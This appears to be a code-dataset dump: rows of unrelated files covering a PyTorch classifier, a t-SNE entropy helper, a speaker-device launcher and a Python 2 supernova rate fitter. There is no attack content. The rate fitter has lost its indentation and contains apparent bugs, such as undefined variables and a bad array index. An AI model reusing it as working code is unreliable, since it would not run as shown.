        """Compute class logits for a batch of images."""
        hidden = self.backbone(input_tensor)
        # flatten(1) keeps the batch dimension; the previous .squeeze()
        # also collapsed a batch of size 1, breaking the classifier input.
        return self.classifier(hidden.flatten(1))

    def training_step(self, batch, batch_idx):
        """One optimization step: cross-entropy loss + accuracy logging."""
        input_tensor, target = batch
        logits = self(input_tensor)
        loss = F.cross_entropy(logits, target)
        self.train_acc(F.softmax(logits, 1), target)
        self.log('train_acc', self.train_acc, on_epoch=True)
        self.log('train_loss', loss, on_epoch=True)
        return loss

    def validation_step(self, batch, batch_idx):
        """Mirror of training_step without returning the loss."""
        input_tensor, target = batch
        logits = self(input_tensor)
        loss = F.cross_entropy(logits, target)
        self.val_acc(F.softmax(logits, 1), target)
        self.log('val_acc', self.val_acc, on_epoch=True)
        self.log('val_loss', loss, on_epoch=True)

    def configure_optimizers(self):
        """Plain Adam over all parameters at the configured learning rate."""
        optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)
        return optimizer
|
7,129 | 0b05b027e3c3147aa2b9c35a0bdc33633ba6e658 | #!/usr/bin/env python3
"""Shannon entropy and P affinities"""
import numpy as np
def HP(Di, beta):
    """Shannon entropy and P affinities of distances `Di` at precision `beta`.

    Returns:
        (Hi, Pi): entropy in bits and the normalized affinity vector.
    """
    weights = np.exp(-Di * beta)
    Pi = weights / weights.sum()
    Hi = -(Pi * np.log2(Pi)).sum()
    return (Hi, Pi)
|
7,130 | bb173d8869039f8bbd3e35529cf2d99b26d2b8ff | #!/usr/bin/env python3
import argparse
from speaker.main import run
def parse_args():
    """Parse the command-line options of the network speaker device."""
    parser = argparse.ArgumentParser(description='Network speaker device.')
    parser.add_argument('-d', '--debug', action='store_true',
                        help='enable debugging messages')
    # The remaining options are simple typed flags; declare them as data.
    for flag, kind, text in (
            ('--host', str, 'IP address to bind network services to'),
            ('--grpc-port', int, 'port for the gRPC service'),
            ('--rtsp-port', int, 'port for the RTSP service'),
            ('--spotifyd-path', str, 'path to a spotifyd binary')):
        parser.add_argument(flag, type=kind, help=text)
    return parser.parse_args()
if __name__ == '__main__':
    run(parse_args())
|
7,131 | 27976e9f7fbe030910b3595ea1a13e0e505183e5 | #!/software/python-2.7-2014q3-el6-x86_64/bin/python
import SNANA_Reader as simread
import REAL_Reader as dataread
#import astropy.cosmology as cosmo
import traceback
import scipy
import scipy.stats as stats
import numpy as np
import matplotlib.pyplot as plt
plt.switch_backend('Agg')
#import Cosmology
import scipy.stats.mstats as mstats
import scipy.stats as stats
from scipy.interpolate import UnivariateSpline
from sys import argv
import glob
import time
import os
import gzip
import shutil
import numpy.ma as ma
import subprocess
import iminuit as iM
from iminuit import Minuit as M
from discreteChi2Func import discreteChi2Func as chi2func
import pandas as pd
class Rate_Fitter:
def __init__(self, realfilename, realName, simfilename, simName, simgenfilename, MCBeta, MCK, zminSamp=0.1, zmaxSamp=1.20 , zminFit = 0.1, zmaxFit = 1.20, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, Rate_Model = 'powerlaw', cheatType = False, cheatZ = False, cheatCCSub = False, cheatCCScale = False, cuts = None, nprint = 5, MURESCuts = None, noCCMC = False, priorRate = None, priorZEff = None, ratePriorErrUp = None, ratePriorErrDown =None, ratePriorErrAll = None, fixCCScale = False):
print "Rate_Fitter"
print "np version {0}".format(np.__version__)
self.zminSamp = zminSamp
self.zmaxSamp = zmaxSamp
self.zminFit = zminFit
self.zmaxFit = zmaxFit
self.MCBeta = MCBeta
self.MCK = MCK
self.Rate_Model = Rate_Model
self.cheatType = cheatType
self.cheatZ = cheatZ
self.cheatCCSub = cheatCCSub
self.cheatCCScale = cheatCCScale
self.cuts = cuts
self.nprint = nprint
self.MURESCuts = MURESCuts
self.priorRate = priorRate
self.priorZEff = priorZEff
self.ratePriorErrUp = ratePriorErrUp
self.ratePriorErrDown = ratePriorErrDown
self.ratePriorErrAll = ratePriorErrAll
self.fixCCScale = fixCCScale
#print "PRIORS"
#print priorRate
#print priorZEff
#print ratePriorErrUp
#print ratePriorErrDown
if self.cheatZ:
self.ztype = 'SIM_ZCMB'
else:
#self.ztype = 'zHD'
self.ztype = 'zPHOT'
self.shiftFlagData = False
self.shiftFlagSim = False
self.globalChi2Storage = []
self.globalNDataStorage = []
'''
self.globalZPhotBinStorage = []
self.globalNDataIaPhotBinStorage = []
self.globalNDataCCPhotBinStorage = []
self.globalZTrueBinStorage = []
self.globalNDataIaTrueBinStorage = []
self.globalNDataCCTrueBinStorage = []
'''
print 'a'
try:
self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)
except:
try:
self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 5)
except:
self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6)
print 'b'
self.simName = simName
self.simgencat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)
print 'c'
try:
#with np.load(simgenfilename+'.npz', allow_pickle = True) as data0:
# SIMGEN = data0['a']
SIMGEN = np.load(simgenfilename + '.npy', allow_pickle = True)
except:
SIMGEN = np.genfromtxt(simgenfilename, dtype=None, names = True, skip_footer=3, invalid_raise=False)
print "Compress save A"
SIMGEN.dtype.names = map(str, SIMGEN.dtype.names)
#np.savez_compressed(simgenfilename+'.npz', a = SIMGEN)
np.save(simgenfilename+'.npy', SIMGEN)
print "WHY DO YOU HATE ME WHEN I SHOW YOU NOTHING BUT LOVE"
print simgenfilename
#SIMGEN = pd.read_csv(simgenfilename, delim_whitespace=True, comment="#").to_records(index = False)
print 'd'
SIMGEN = SIMGEN[SIMGEN['GENZ'] != 'GENZ']
self.simgencat.params = {'flat':True, 'H0': simH0, 'Om0':simOmegaM, 'Ob0': simOb0, 'sigma8': simSigma8, 'ns': simNs}
#self.simgencat.cosmo = Cosmology.setCosmology('simCosmo', self.simcat.params)
self.simgencat.OrigCatalog = np.copy(SIMGEN)
self.simgencat.Catalog = np.copy(SIMGEN)
self.simgencat.Catalog = self.simgencat.Catalog[self.simgencat.Catalog['GENZ'] != 'GENZ']
self.simgencat.simname = simName
self.simgencat.NSN = self.simgencat.Catalog['GENZ'].shape[2]
print "SIMGEN NUMBER"
print self.simgencat.NSN
print "TEST2"
print self.simgencat.Catalog['GENZ'].shape[0]
print self.simgencat.Catalog['GENZ'].shape[1]
print self.simgencat.Catalog['GENZ'].shape[2]
print "SIMGENCAT FILE"
print simfilename
self.realName = realName
try:
print 'q'
self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6)
except:
#self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)
try:
print 'r'
self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)
except:
print 's'
self.realcat = dataread.REAL_Cat(realfilename, realName, skip_header =11 )
if self.cheatType:
print "WARNING, THE FITTER IS CHEATING AND ELIMINATED NON-IAs USING SIM INFO"
self.realcat.Catalog = self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]
self.simcat.Catalog = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]
print "Pre cut Catalog"
print self.realcat.Catalog.shape
for cut in cuts:
print 'a'
print cut
print self.realcat.Catalog.shape
self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.realcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])]
self.simcat.Catalog = self.simcat.Catalog[(self.simcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.simcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])]
print 'b'
print cut
print self.realcat.Catalog.shape
self.postCutRealCat = np.copy(self.realcat.Catalog)
self.postCutSimCat = np.copy(self.simcat.Catalog)
self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)]
self.simcat.Catalog = self.simcat.Catalog[(self.simcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.simcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)]
print 'zCut Pre MURESCut'
print np.sum((self.realcat.Catalog[self.ztype].astype(float) > self.zminFit) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxFit))
print 'MURESCUT'
print self.MURESCuts
print self.realcat.Catalog.shape
if not (self.MURESCuts is None):
'''
#MURES Cut format: (zmin, zmax, neg Cut, pos Cut)
for mc in self.MURESCuts:
realCond = (self.realcat.Catalog[self.ztype] < mc[0]) | (self.realcat.Catalog[self.ztype] > mc[1])| ((self.realcat.Catalog['MURES'] > mc[2])& (self.realcat.Catalog['MURES'] < mc[3]))
simCond = (self.simcat.Catalog[self.ztype] < mc[0]) | (self.simcat.Catalog[self.ztype] > mc[1])| ((self.simcat.Catalog['MURES'] > mc[2])& (self.simcat.Catalog['MURES'] < mc[3]))
self.realcat.Catalog = self.realcat.Catalog[realCond]
self.simcat.Catalog = self.simcat.Catalog[simCond]
'''
self.realcat.Catalog = self.realcat.Catalog[ np.abs( self.realcat.Catalog['MURES'] * 1.0 / self.realcat.Catalog['MUERR'] ) < MURESCuts]
self.simcat.Catalog = self.simcat.Catalog[ np.abs( self.simcat.Catalog['MURES'] * 1.0 / self.simcat.Catalog['MUERR'] ) < MURESCuts]
print "PostMURESCut Shape"
print self.realcat.Catalog.shape
print 'zCut Post MURESCut'
print np.sum((self.realcat.Catalog[self.ztype].astype(float) > self.zminFit) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxFit))
print "Post cut Catalog"
print self.realcat.Catalog.shape
if noCCMC:
self.simgencat.Catalog = self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'] == 1]
self.simcat.Catalog = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]
def newData(self, realfilename, realName, simInd =100):
self.realName = realName
self.shiftFlagData = False
try:
self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)
except:
self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6 )
if self.cheatType:
print "WARNING, THE FITTER IS CHEATING AND ELIMINATED NON-IAs USING SIM INFO"
self.realcat.Catalog = self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]
if simInd < self.nprint:
print 'N precuts'
print self.realcat.Catalog['FITPROB'].shape
print "Pre cut Catalog"
print self.realcat.Catalog.shape
for cut in cuts:
self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.realcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])]
self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)]
print "Post cut Catalog"
print self.realcat.Catalog.shape
self.postCutRealCat = np.copy(self.realcat.Catalog)
print 'MURESCUT'
print self.MURESCuts
print self.realcat.Catalog.shape
if not (self.MURESCuts is None):
#MURES Cut format: (zmin, zmax, neg Cut, pos Cut)
'''
for mc in self.MURESCuts:
realCond = (self.realcat.Catalog[self.ztype] < mc[0]) | (self.realcat.Catalog[self.ztype] > mc[1])| ((self.realcat.Catalog['MURES'] > mc[2])& (self.realcat.Catalog['MURES'] < mc[3]))
self.realcat.Catalog = self.realcat.Catalog[realCond]
'''
self.realcat.Catalog = self.realcat.Catalog[np.abs(self.realcat.Catalog['MURES']*1.0/self.realcat.Catalog['MUERR']) < MURESCuts]
print "PostMURESCut Shape"
print self.realcat.Catalog.shape
if simInd < self.nprint:
print "Minimum Fitprob"
print np.min(self.realcat.Catalog['FITPROB'])
print 'N postcuts'
print self.realcat.Catalog['FITPROB'].shape
def zSystematic(self, binList = None, nbins = None):
assert(0)
if nbins is None:
try:
self.nbins = len(binList) - 1
self.binList = binList
except:
self.nbins = binList.shape[0] - 1
self.binList = binList
else:
binList = np.linspace(self.zmin, self.zmax, nbins+1)
self.nbins = nbins
self.binList = binList
if self.shiftFlagData:
print "DONT DOUBLE SHIFT"
return 0
if not self.shiftFlagSim:
oldsimz = self.simcat.Catalog['zPHOT']
oldsimtruez = self.simcat.Catalog['SIM_ZCMB']
stat, bins, binnum = stats.binned_statistic(oldsimz, oldsimz - oldsimtruez, bins = self.binList, statistic = 'mean')
self.zBiasShifts = stat
newsimz = oldsimz - stat[binnum]
assert(np.sum(np.abs(newsimz - oldsimz)) > 0)
assert((oldzshape - np.arange(0, oldz.shape[0]).shape[0])< 1)
self.shiftFlagSim = True
oldz = self.realcat.Catalog['zPHOT']
_,_, binnum = stats.binned_statistic(oldz, oldz , bins = self.binList, statistic = 'mean')
newz = oldz - self.zBiasShifts[binnum]
oldzshape = oldz.shape[0]
self.realcat.Catalog['zPHOT'].put(np.arange(0, oldz.shape[0]), newz)
assert(np.sum(np.abs(newz - oldz)) > 0)
assert((oldzshape - np.arange(0, oldz.shape[0]).shape[0])< 1)
self.simFlagData = True
def effCalc(self, fracContamCut = 0.0, nbinsSamp = None, nbinsFit = None, binListSamp = None, binListFit = None, simInd =100):
#### Do we want SNIas or all SN for efficiency?
import matplotlib as mpl
if nbinsSamp is None:
try:
self.nbinsSamp = len(binListSamp) - 1
self.binListSamp = binListSamp
except:
self.nbinsSamp = binListSamp.shape[0] - 1
self.binListSamp = binListSamp
else:
binListSamp = np.linspace(self.zminSamp, self.zmaxSamp, nbinsSamp+1)
self.nbinsSamp = nbinsSamp
self.binListSamp = binListSamp
if nbinsFit is None:
try:
self.nbinsFit = len(binListFit) - 1
self.binListFit = binListFit
except:
self.nbinsFit = binListFit.shape[0] - 1
self.binListFit = binListFit
else:
binListFit = np.linspace(self.zminFit, self.zmaxFit, nbinsFit+1)
self.nbinsFit = nbinsFit
self.binListFit = binListFit
self.typeString = ''
#if self.cheatZ:
# self.ztype = 'SIM_ZCMB'
#else:
# self.ztype = 'zPHOT'
'''
if (fracContamCut > 0.000000001) & (fracContamCut < 1.0):
print " Cutting based on Frac Contam"
histTot, binsX, binsY = np.histogram2d(self.simcat.Catalog[ztype], self.simcat.Catalog['MURES'], bins = nbins)
histCC, binsX, binsY = np.histogram2d(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) != 1][ztype], self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) != 1]['MURES'], bins = (binsX, binsY))
fracContam = histCC.astype(np.float)/histTot.astype(np.float)
for fcRow, i in zip(fracContam, xrange(binsX.shape[0])):
for fc, j in zip(fcRow, xrange(binsY.shape[0])):
if fc < fracContamCut:
continue
else:
simInBin = (self.simcat.Catalog[ztype] > binsX[i]) & (self.simcat.Catalog[ztype] < binsX[i+1]) & (self.simcat.Catalog['MURES'] > binsY[j]) & (self.simcat.Catalog['MURES'] < binsY[j+1])
realInBin = (self.realcat.Catalog[ztype] > binsX[i]) & (self.realcat.Catalog[ztype] < binsX[i+1]) & (self.realcat.Catalog['MURES'] > binsY[j]) & (self.realcat.Catalog['MURES'] < binsY[j+1])
self.simcat.Catalog = self.simcat.Catalog[np.invert(simInBin)]
self.realcat.Catalog = self.realcat.Catalog[np.invert(realInBin)]
'''
zPHOTs = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1][self.ztype].astype(float)
zTRUEs = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]['SIM_ZCMB'].astype(float)
self.typeString = self.typeString + 'A1'
print "Type Location A"
print "Choice A1"
print zPHOTs.shape
print zTRUEs.shape
print binList
counts, zPhotEdges, zTrueEdges, binnumber = scipy.stats.binned_statistic_2d(zPHOTs, zTRUEs, zTRUEs, statistic = 'count', bins = (self.binListFit, self.binListSamp))
assert(zPhotEdges.shape[0] == (self.nbinsFit + 1))
print "Type Location B"
print "Choice B1"
self.typeString = self.typeString + 'B1'
zGenHist, zGenBins = np.histogram(self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'].astype(int) == 1]['GENZ'].astype(float), bins = self.binListSamp)
#zSim1Hist, zSim1Bins = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) ==1]['SIM_ZCMB'].astype(float), bins = self.binListSamp)
print "counts of zTrue in each zPhot vs zTrue bin"
print counts.astype(int)
print "zGen Bins"
print zGenBins
print 'zGen Histogram'
print zGenHist
print "sum zGen events"
print np.sum(zGenHist)
print "sum zPhot events"
print np.sum(counts)
#print "DEBUG HERE"
#assert(0)
self.effmat = np.zeros((self.nbinsFit, self.nbinsSamp))
xMax = zPhotEdges.shape[0] - 2
yMax = zTrueEdges.shape[0] - 2
print zGenHist
print counts.astype(int)
'''
for zPhotLedge, zPhotRedge, row, i in zip(zPhotEdges[:-1], zPhotEdges[1:], counts, xrange(xMax + 1)):
zPhotCenter = (zPhotLedge + zPhotRedge)/2.0
for zTrueLedge, zTrueRedge, count, j in zip(zTrueEdges[:-1], zTrueEdges[1:], row, xrange(yMax + 1)):
zTrueCenter = (zTrueLedge + zTrueRedge)/2.0
inCell = (zPHOTs > zPhotLedge) & (zPHOTs < zPhotRedge) & (zTRUEs > zTrueLedge)& (zTRUEs < zTrueRedge)
zPhotCell = zPHOTs[inCell];zTrueCell = zTRUEs[inCell]
self.effmat[i][j] = count # np.sum(inCell)
#print "inCell"
#print np.sum(inCell)
#print "count"
#print count
#try:
# assert(np.abs(np.sum(inCell) - count) < 2)
#except:
# print "CHECK ABOVE"
for row, i in zip(self.effmat, xrange(self.effmat.shape[0])):
for j in xrange(row.shape[0]):
self.effmat[i][j] /= zGenHist[j]
'''
self.effmat = counts/zGenHist
#if simInd < self.nprint:
print 'effmat'
print self.effmat
extent = [zPhotEdges[0], zPhotEdges[-1], zTrueEdges[0], zTrueEdges[-1]]
if (simInd == 0) or (not ('sim' in self.realName.lower())):
plt.figure()
plt.imshow(np.flipud(counts.T), extent = extent, cmap = 'Blues')
plt.colorbar()
plt.savefig(self.realName + 'redshiftDistro.png')
plt.clf()
plt.close()
plt.figure()
plt.imshow(np.flipud(self.effmat.T), extent = extent, cmap = 'Blues', norm=mpl.colors.LogNorm())
plt.colorbar()
plt.savefig(self.realName + 'efficiencyMatrixLog.png')
plt.clf()
plt.close()
plt.figure()
plt.imshow(np.flipud(self.effmat.T), extent = extent, cmap = 'Blues')
plt.colorbar()
plt.savefig(self.realName + 'efficiencyMatrix.png')
plt.clf()
plt.close()
def fit_rate(self, fixK = False, fixBeta = False, simInd =100, trueBeta = 0, CCScale = 1.0, CCScaleErr = None, TrueCCScale = 1.0, BetaInit = 0.0, kInit = 1.0, BetaErr = 1, kErr = 1, f_Js = None, CCZbins = None, scaleZBins = None, Blind = False):
#import iminuit as iM
#from iminuit import Minuit as M
#import numpy as np
#import matplotlib as mpl
#import matplotlib.pyplot as plt
#if self.cheatZ:
# self.ztype = 'SIM_ZCMB'
#else:
# self.ztype = 'zPHOT'
plt.switch_backend('Agg')
if simInd < self.nprint:
print "Type Location C"
print "Choice C1"
if len(self.typeString) <= 4:
self.typeString = self.typeString + 'C1'
nSim, simBins = np.histogram(self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'].astype(int) == 1]['GENZ'].astype(float), bins=self.binListSamp)
if simInd < self.nprint:
print "nSim1"
print nSim
print self.simgencat.Catalog.shape
print "FIGURE OUT WHY YOU MADE THIS ASSERT STATEMENT LATER"
#assert(0)
nSim2, simBins2 = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) ==1][self.ztype].astype(float), bins=self.binListFit)
nSim3, simBins3 = np.histogram(self.simcat.Catalog[self.ztype].astype(float), bins=self.binListFit)
NCC , _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1][self.ztype].astype(float), bins=self.binListFit)
if self.fixCCScale:
print "Fix CC Scale at 1"
else:
if simInd < self.nprint:
print "nSim2"
print nSim2
print "nSim3"
print nSim3
print "nCC"
print NCC
OrigNCC = np.copy(NCC)
if self.cheatCCSub:
if self.cheatCCScale:
print "WARNING: Only cheating on CC Subtraction not scale"
print "Setting NCC to infinity to make sure that cheating correctly"
print "Diagnostics after this point may be nonsense"
print self.cheatCCSub
print "NCC BeforeFck"
print NCC
NCC = NCC*1E100
print "NCC AfterFck"
print NCC
elif self.cheatCCScale:
print "NCC Before1"
print NCC
print TrueCCScale
NCC = applyCCScale(NCC, TrueCCScale, CCScaleErr, zbins = CCZbins, datazbins = self.binListFit)
print "NCC After1"
print NCC
else:
print "NCC Before2"
print NCC
print CCScale
NCC = applyCCScale(NCC, CCScale, CCScaleErr, zbins = CCZbins, datazbins = self.binListFit)
print "NCC After2"
print NCC
#assert(0)
NIa , _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1][self.ztype].astype(float), bins=self.binListFit)
'''
DebugNIaPhot, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]['zPHOT'].astype(float), bins=self.binListFit)
DebugNCCPhot, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1]['zPHOT'].astype(float), bins=self.binListFit)
DebugNCCPhot = applyCCScale(DebugNCCPhot, CCScale, CCScaleErr, zbins = scaleZBins, datazbins = self.binListFit)
DebugNIaTrue, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]['SIM_ZCMB'].astype(float), bins=self.binListSamp)
DebugNCCTrue, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1]['SIM_ZCMB'].astype(float), bins=self.binListSamp)
DebugNCCTrue = applyCCScale(DebugNCCTrue, CCScale, CCScaleErr, zbins = scaleZBins, datazbins = self.binListSamp)
uselessCtr = 0
for niap, nccp, niat, ncct, zp, zt in zip(DebugNIaPhot, DebugNCCPhot, DebugNIaTrue, DebugNCCTrue,(self.binListFit[1:] + self.binListFit[:-1])/2.0, (self.binListSamp[1:] + self.binListSamp[:-1])/2.0 ):
uselessCtr +=1
self.globalZTrueBinStorage.append(zt)
self.globalZPhotBinStorage.append(zp)
self.globalNDataIaPhotBinStorage.append(niap)
self.globalNDataCCPhotBinStorage.append(nccp)
self.globalNDataIaTrueBinStorage.append(niat)
self.globalNDataCCTrueBinStorage.append(ncct)
print "UselessCtr"
print uselessCtr
'''
try:
TrueNCC, _ = np.histogram(self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'] !=1][self.ztype].astype(float), bins=self.binListFit)
if simInd < self.nprint:
print "True NCC Data"
print TrueNCC
except:
print "Using real data"
TrueNCC = 0.0
nData, dataBins = np.histogram(self.realcat.Catalog[self.ztype].astype(float), bins=self.binListFit)
print "nData"
print nData
if not(self.cheatCCSub):
FracBad = NCC*1.0/(1.0*(NCC+NIa))
nCCData = nData*FracBad
else:
nCCData = TrueNCC*1.0
FracBad = TrueNCC*1.0/nData
if simInd < self.nprint:
print "PreScale NCC/nSim"
print OrigNCC*1.0/(OrigNCC+NIa)
print "PreScale Pred NCC Data"
print OrigNCC*1.0/(OrigNCC+NIa)*nData
print "PreScale Pred NCC Data if 2NCC"
print OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData
print "TrueNCC"
print TrueNCC
if type(TrueNCC) != int:
if simInd < self.nprint:
print "PreScale PredNCCData - TrueNCCData"
print OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC
print "PreScale PredNCCData - TrueNCCData/ PredNCCData"
print (OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC)/(OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData)
else:
print "Using real data"
print "Mean of PreScale PredNCCData - TrueNCCData/ PredNCCData"
print np.nanmean((OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC)/(OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData))
print "PostScale NCC/nData"
print NCC*1.0/(NCC+NIa)
if simInd < self.nprint:
print "Fraction of CCs in each bin"
print FracBad
print 'NCC'
print NCC
print 'nSim2'
print nSim2
print "nData, dataBins, realcat shape pre contam correction"
print nData
print dataBins
print np.sum(self.realcat.Catalog[self.ztype].astype(float) > self.zmaxFit)
print np.sum(self.realcat.Catalog[self.ztype].astype(float) < self.zminFit)
print self.realcat.Catalog[self.ztype].shape
print "Ratio nData/nSim"
print 1.0*nData/(1.0*nSim3)
print "Ratio nSim2/nData"
print 1.0*nSim3/(1.0*nData)
print "FracBad"
print FracBad
print 'NCCData'
print nCCData
if simInd < self.nprint:
print "overall Contam"
print np.sum(NCC)*1.0/(np.sum(nSim3)*1.0)
def chi2func(nData, nSim, effmat, fnorm, zCentersSamp, zCentersFit, k = 1.0, Beta = 0.0, zBreak = 1.0, dump = False, complexdump = False, modelError = False, nIA = None, nCC = None, Rate_Model = 'powerlaw', zbins = None, simInd = 100, BetaPrior = (-3, 3), KPrior = (0.0, 50.0), priorRate = None, priorZEff = None, ratePriorErrUp = None, ratePriorErrDown =None, ratePriorErrAll = None, TrueNCCData = None, f_1 = 1.0, f_2 = 1.0, f_3 = 1.0, f_4 = 1.0, f_5 = 1.0, f_6 = 1.0, f_7 = 1.0, f_8 = 1.0, f_9 = 1.0, f_10 = 1.0, f_11 = 1.0):
    """Chi-squared between binned data counts and rate-weighted, efficiency-folded sim counts.

    Parameters
    ----------
    nData, nSim : per-bin counts for data (fit binning) and sim (sample binning).
    effmat      : migration/efficiency matrix; rows = fit bins, cols = sample bins.
    fnorm       : overall sim-to-data normalization factor.
    zCentersSamp, zCentersFit : bin-center redshifts for the two binnings.
    k, Beta, zBreak : rate-model parameters (power law k*(1+z)**Beta; zBreak for
        the broken-power-law variants).
    f_1 .. f_11 : per-bin rate factors used only when Rate_Model == 'discrete'.
    nIA, nCC    : per-bin sim Ia / core-collapse counts used to build the CC
        contamination fraction; if either is None, contamination is taken as zero.
    priorRate, priorZEff, ratePriorErr* : optional external rate prior (see ratePrior).
    dump        : when True, print diagnostics and also return the per-bin chi2 list.

    Returns
    -------
    chi2 (+ per-bin chi2 list when dump is True).

    NOTE(review): this is a closure -- it reads self (nprint, nbinsFit, nbinsSamp,
    cheatCCSub, MCK, MCBeta) and, on the cheatCCSub branch, TrueNCC from the
    enclosing method's scope; confirm TrueNCC is always defined when cheatCCSub is set.
    """
    if simInd < self.nprint:
        print "PRIORS2"
        print priorRate
        print priorZEff
        print ratePriorErrUp
        print ratePriorErrDown
    Chi2Temp = 0.0
    # Build the per-sample-bin rate weights f_Js according to the rate model.
    if Rate_Model == 'powerlaw':
        f_Js = k*(1+zCentersSamp)**Beta
    elif Rate_Model == 'discrete':
        f_Js = np.array([f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11])
    elif (Rate_Model == 'brokenpowerlaw') | (Rate_Model == 'brokenpowerlawVar'):
        f_Js = []
        #zCenters = (zbins[1:]+zbins[:-1])/2.0
        # Below zBreak: power law; above: frozen at the last pre-break value.
        temp = None
        for zC in zCentersSamp:
            if zC < zBreak:
                f_Js.append(k*(1+zC)**Beta)
            elif not(temp is None):
                f_Js.append(temp)
            else:
                temp = f_Js[-1]
                f_Js.append(temp)
        f_Js = np.array(f_Js)
    else:
        assert(0)  # unknown Rate_Model
    if simInd < self.nprint:
        if Rate_Model == 'discrete':
            print "f_Js init"
            print f_Js
        else:
            print "Beta init"
            print Beta
            print "k init"
            print k
    #chi2Mat = np.zeros((self.nbinsFit))
    #adjNMC = np.zeros((self.nbinsFit))
    # Weak (quartic-walled) priors keep k and Beta in a sane range; no priors
    # are applied to the discrete per-bin factors.
    if Rate_Model == 'discrete':
        kprior = 0
        betaprior = 0
    else:
        kprior = weakPrior(k, KPrior)
        betaprior = weakPrior(Beta, BetaPrior)
    if dump and (self.nprint > simInd):
        print "kprior"
        print kprior
        print "betaprior"
        print betaprior
    # Fraction of each data bin expected to be core-collapse contamination.
    if (nIA is None) or (nCC is None):
        if dump:
            print "No CC Cut"
        fracCCData = np.zeros(nData.shape)
    elif self.cheatCCSub:
        # TrueNCC comes from the enclosing scope (true CC counts from sim truth).
        fracCCData = TrueNCC*1.0/nData
    else:
        if Rate_Model == 'discrete':
            if dump and (self.nprint > simInd):
                print 'f_J adjusted CC Cut'
                print Rate_Model
                print nCC
                print nIA
                print np.array(f_Js)
            fracCCData = (nCC*1.0)/((1.0*nCC + nIA*np.array(f_Js)))
            print fracCCData
        else:
            if dump and (self.nprint > simInd):
                print "Beta Adjusted CC Cut"
                print Rate_Model
